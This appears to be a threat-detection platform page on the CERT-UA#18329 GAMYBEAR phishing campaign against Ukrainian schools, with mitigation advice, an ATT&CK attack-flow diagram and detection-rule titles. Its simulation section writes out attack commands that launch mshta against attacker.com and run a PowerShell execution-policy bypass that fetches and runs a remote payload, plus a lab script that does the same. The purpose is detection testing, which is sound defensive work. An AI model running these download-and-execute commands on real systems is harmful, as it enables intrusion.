Targeted cyberattack on an eastern Ukraine school using the GAMYBEAR tool (CERT-UA#18329)
Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A credential-harvesting campaign hit schools and public agencies in the Sumy region via a phishing email containing a ZIP attachment. Opening the archive triggered an HTA file through the mshta utility, which then pulled down PowerShell scripts to deploy the GAMYBEAR backdoor and the LaZagne credential dumper, establish HTTP-based C2, and exfiltrate files from targeted directories.
Attack Analysis
CERT-UA linked the initial breach to a phishing message sent on May 26, 2025, from a hijacked Gmail account, providing the campaign details in the CERT-UA#18329 alert. Forensic analysis exposed a multi-stage infection chain: ZIP → HTA → update.js → PowerShell → GAMYBEAR accompanied by LaZagne malware, with persistence maintained via a Run-registry entry and recurring downloads from malicious URLs.
Mitigation
Enforce multi-factor authentication for all email accounts, block execution of HTA and untrusted PowerShell scripts, lock down the registry Run key, and implement application whitelisting. Continuously update endpoint detection rules to recognize the referenced filenames, hashes, and network indicators.
Response
Promptly isolate impacted endpoints, reset the compromised Gmail credentials, gather all identified IOCs, and run comprehensive scans for GAMYBEAR, LaZagne, and associated artifacts. Inform CERT-UA about the incident and distribute IOCs through relevant threat-intelligence sharing channels.
“`mermaid graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes action_phishing[“<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Compromised a university Gmail account and sent spearphishing emails with a ZIP attachment named \”НакaĐ· â„– 332\”.”] class action_phishing action tool_mshta[“<b>Tool</b> – <b>Name</b>: mshta.exe<br/><b>Technique</b>: T1218.005 System Binary Proxy Execution”] class tool_mshta tool malware_hta[“<b>Malware</b> – <b>Name</b>: zvit.hta (HTML Application)<br/>Executed via the shortcut delivered in the ZIP.”] class malware_hta malware action_powershell[“<b>Action</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/>HTA launched update.js which started updater.ps1. PowerShell downloaded additional binaries (be53ff4f4b5daa.exe, svshosts.exe) from remote HTTP servers.”] class action_powershell action tool_ps2exe[“<b>Tool</b> – <b>Name</b>: PS2EXE<br/><b>Technique</b>: T1027.004 Compile After Delivery (obfuscation)”] class tool_ps2exe tool action_uac_bypass[“<b>Action</b> – <b>T1548.002 Abuse Elevation Control Mechanism: Bypass UAC</b><br/>Created HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command key with DelegateExecute value to bypass User Account Control.”] class action_uac_bypass action action_persistence[“<b>Action</b> – <b>T1547.014 Boot or Logon Autostart Execution: Active Setup</b><br/>Added HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run entries (IEUpdater, ServiceUpdateService) to launch binaries at logon.”] class action_persistence action tool_registry[“<b>Tool</b> – <b>Name</b>: Registry Modification<br/><b>Technique</b>: Persistence via Run keys”] class tool_registry tool action_credential_dump[“<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>Executed LaZagne (be53ff4f4b5daa.exe) to extract stored passwords and other credentials.”] class action_credential_dump action tool_lazagne[“<b>Tool</b> – <b>Name</b>: LaZagne<br/><b>Purpose</b>: Retrieve saved credentials from browsers, mail clients, and other applications”] class tool_lazagne tool action_data_encoding[“<b>Action</b> – <b>T1132 Data Encoding</b><br/>Communications between GAMYBEAR backdoor components (svshosts.exe, ieupdater.exe) and C2 were sent over HTTP with Base64‑encoded payloads.”] class action_data_encoding action malware_gamybear[“<b>Malware</b> – <b>Name</b>: GAMYBEAR backdoor<br/>Components include svshosts.exe and ieupdater.exe.”] class malware_gamybear malware %% Connections action_phishing –>|delivers| tool_mshta tool_mshta –>|executes| malware_hta malware_hta –>|runs| action_powershell action_powershell –>|uses| tool_ps2exe action_powershell –>|downloads| malware_gamybear action_powershell –>|creates| action_uac_bypass action_uac_bypass –>|modifies| tool_registry action_persistence –>|relies on| tool_registry action_persistence –>|launches| malware_gamybear action_credential_dump –>|uses| tool_lazagne tool_lazagne –>|collects| action_data_encoding malware_gamybear –>|communicates via| action_data_encoding %% End of diagram “`
Attack Flow
Detections
Detection of GAMYBEAR C2 Communication [Windows Network Connection]
View
Detection of GAMYBEAR Backdoor Execution [Windows File Event]
View
Detection of mshta.exe and PowerShell Execution with Bypass [Windows Process Creation]
View
IOCs (HashSha1) to detect: Cyberattack against an educational institution in eastern Ukraine using the GAMYBEAR tool (CERT-UA#18329)
View
IOCs (DestinationIP) to detect: Cyberattack against an educational institution in eastern Ukraine using the GAMYBEAR tool (CERT-UA#18329)
View
Simulations
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
-
Stage 1 – Deploy malicious HTA: The attacker hostsÂ
evil.hta on a compromised web server. -
Stage 2 – Execute viaÂ
mshta.exe: Using a Windows command prompt, the attacker runsÂmshta.exe http://attacker.com/evil.hta. This creates a process‑creation event withÂmshta.exe in the command line, satisfying the first clause of the rule. -
Stage 3 – PowerShell bypass: To run a payload that circumvents the system’s Execution Policy, the attacker launches PowerShell with theÂ
-ep bypass flag:PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMP\p.ps1; & $env:TEMP\p.ps1"This generates a second process‑creation event containing the exact stringÂ
PowerShell -ep bypass, satisfying the second clause.
-
-
Regression Test Script:Â The following PowerShell script reproduces the above steps in an automated, repeatable fashion.
# ------------------------------------------------- # Regression Test – Trigger Sigma Rule for mshta & PowerShell -ep bypass # ------------------------------------------------- # Variables – adjust to your lab environment $htaUrl = "http://127.0.0.1/evil.hta" # Must point to a reachable HTA file $psUrl = "http://127.0.0.1/payload.ps1" # Simple PS payload (e.g., `Write-Host "pwned"`) # 1. Invoke mshta.exe Write-Host "[*] Launching mshta.exe against $htaUrl" Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow # Short pause to ensure the process logs Start-Sleep -Seconds 2 # 2. Invoke PowerShell with execution‑policy bypass $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMP\p.ps1; & $env:TEMP\p.ps1" Write-Host "[*] Launching PowerShell -ep bypass" Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow # Pause to allow logging Start-Sleep -Seconds 5 Write-Host "[+] Test complete. Check your SIEM for alerts." -
Cleanup Commands:Â Remove temporary files and terminate any lingering test processes.
# Cleanup temporary payload Remove-Item -Path "$env:TEMP\p.ps1" -ErrorAction SilentlyContinue # Optionally kill lingering mshta or PowerShell instances spawned by the test Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force